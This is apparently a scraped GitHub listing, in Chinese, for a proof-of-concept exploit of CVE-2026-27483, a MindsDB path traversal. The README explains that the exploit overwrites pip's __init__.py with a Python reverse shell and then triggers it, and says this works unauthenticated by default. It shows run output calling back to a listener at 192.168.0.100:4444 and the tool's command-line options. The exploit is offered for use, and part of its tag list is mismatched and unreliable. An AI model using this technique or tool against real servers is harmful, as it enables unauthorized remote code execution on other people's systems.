thewhiteh4t/cve-2026-27483

GitHub: thewhiteh4t/cve-2026-27483

针对 MindsDB 路径遍历漏洞 CVE-2026-27483 的 PoC 脚本,通过覆盖 Python 包文件实现远程代码执行。

Stars: 2 | Forks: 0

# CVE-2026-27483 ## MindsDB 路径遍历导致 RCE PoC 本 PoC 脚本基于以下 [GitHub 公告](https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq) - 默认情况下 MindsDB **不**使用认证 - PoC 支持**未认证**和**已认证**两种模式 - 我们可以查询 `/api/handlers/` 来查找可用的 handler,使用任何可用但未安装的 handler 名称 - PoC 会覆盖 `/venv/lib/python3.10/site-packages/pip/__init__.py` - 一个 Python 反向 shell 会被写入上述路径,随后被触发执行 ``` python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password ------------------------------------- --- CVE-2026-27483 ------------------ --- MindsDB Path Traversal to RCE --- ------------------------------------- [>] Found By : XlabAITeam [>] PoC By : Lohitya Pushkar (thewhiteh4t) [>] Target : http://127.0.0.1:47334 [>] LHOST : 192.168.0.100 [>] LPORT : 4444 [*] Checking status... [*] MindsDB Version : 25.9.1.0 [+] Login successful! [*] Uploading payload : qwvhotfj [+] Payload uploaded! [*] Triggering payload... ``` ### 依赖 ``` pip3 install requests packaging ``` ### 使用方法 ``` python cve-2026-27483.py -h usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P] options: -h, --help show this help message and exit -rh RH Target host -rp RP Target port -lh LH Listener host -lp LP Listener port -u U Username -p P Password ```
标签:CISA项目, CVE-2026-27483, MindsDB, PE 加载器, PoC, Python, RCE, 反弹Shell, 文件写入, 无后门, 暴力破解, 未经身份验证, 编程工具, 网络安全, 网络安全审计, 路径遍历, 远程代码执行, 逆向工具, 隐私保护